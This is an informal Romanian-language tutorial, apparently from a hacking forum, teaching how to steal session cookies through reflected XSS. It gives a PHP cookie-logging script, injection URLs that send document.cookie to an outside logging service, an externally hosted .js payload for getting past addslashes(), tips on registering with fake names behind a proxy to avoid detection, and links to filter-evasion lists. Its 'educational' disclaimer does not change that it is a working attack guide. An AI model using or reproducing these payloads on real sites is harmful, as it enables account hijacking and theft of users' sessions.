Acest tutorial e facut cu scopuri educative asa ca nu imi asum nici un lucru malefic pe care il veti face invatand din acest tutorial! In acest tutorial am sa incerc sa va explic cum sa furati cookieuri folosind XSS,folosind un Cookie Stealer mai exact.Tutorialul va fii impartit in cativa pasi usori. Pasul 1:Gasirea vulnerabilitatii XSS Imi asum faptul ca fiecare dintre cei care doreste sa creeze un Cookie Stealer stie deja sa gaseasca o vulnerabilitate XSS. Pentru acest tutorial ne vom folosi doar de o simpla GET variabila XSS. Daca ai inteles asta si stii cum functioneaza metoda POST,vei fi capabil sa faceti totul fara probleme. http://www.exemplu.ro/search.php?query="><script>alert(123)</script> Cand aceasta pagina e incarcata,un alert cu "124" va aparea,ceea ce inseamna ca pagina e vulnerabila. Pasul 2:Creearea unui Cookie Stealer Pentru a fura cookieuri,ne trebuie,de exemplu,o pagina PHP care sa le pastreze pe ea pentru noi.Un simplu cookie stealer poate arata asa: <?php $cookie = $HTTP_GET_VARS["cookie"]; $file = fopen('log.txt', 'a'); fwrite($file, $cookie . "nn"); fclose($file); ?> Totodata sunt alte metode pentru a folosi cookieul.Cea mai buna dupa parerea mea este(si cea mai sigura) folosirea CCL ce poate fi gasita aici http://ccl.whiteacid.org/ . Daca folosest propriul host,poti fii detectat foarte usor .Asa ca eu am sa folosesc CCL in acest tutorial.O data inregistrat pe CCL vei primi un account format dintr-un numar random.In acest tutorial am sa folosesc un account fals , 123456. Acum testam serviciul CCL prin executarea unui string de test,mergand aici: http://ccl.whiteacid.org/log.php?123456test_for_XSS. Trebuie sa includem ID ul nostru in link,altfel nu va aparea in logurile noastre.Apoi ne logam pe CCL si vom vedea un nou log cu IP ul nostru,reffererul,user agentul si bineinteles textul 'text_for_xss'.Cookie stealerul functioneaza perfect. Pasul 3:Logarea unui cookie Deci avem o vulnerabilitate XSS si un Cookie Logger.Ceea ce trebuie sa facem e sa le conectam una la alta. Facem o noua injectare de cod(in locul acelui alert) ce trimite datele cookieului.Poate arata asa: http://www.exemplu.ro/search.php?query="><script>location.href = 'http://ccl.whiteacid.org/log.php?123456'+document.cookie;</script> Daca siteul nu foloseste addslashes() care sa se "confrunte" cu codul nostru,vom primi cu succes cookieul in cookie loggerul de pe CCL(unde se si salveaza).De acolo putem copia cookieul furat si sa il inlocuim pe al nostru cu el,logandu-ne astfel in accountul caruia ii apartine acel cookie. Pasul 4:Filtrul Sa zicem ca am intalnit urmatoarea problema(uzuala).Siteul foloseste addslashes() in variabila GET inainte de a o afisa ceea ce ucide injectia noastra,distrungand citatiile.Nici o problema,trebuie sa gasim doar o alta metoda pentru a face asta. Ne inregistram un cont pe un host free(am sa folosesc contul hertz de pe FreeWebs.com pentru acest tutorial) si sa facem un nou script.Fac un fisier numit cookiestealer.js si imi da urmatorul continut. location.href = 'http://ccl.whiteacid.org/log.php?123456'+document.cookie; Acum 'accesam' scriptul printr-o pagina vulnerabila XSS. http://www.exemplu.ro/search.php?query="><script src=http://www.freewebs.com/hertz/cookiesteal.js> Logheaza-te din nou pe CCL si vei vedea noul log salvat.Nu uita sa te inregisrezi pe hostul free cu un nume fals si folosind un proxy bun ca sa nu poti fii detectat.Poti folosi si XSSed.com pentru a ti fiserele cu scripturile. Daca dai peste altre filtre decat addslashes() incearca sa rulezi scriptul prin intermediul iframeurilor,imaginilor,etc. Pentru trickuri bune in privinta trecerii peste filtre,viziteaza: http://www.xssing.com/index.php?x=1 http://ha.ckers.org/xss.html Te poti simtii liber sa ma contactezi daca ai vreo intrebare,nelamurire. Hertz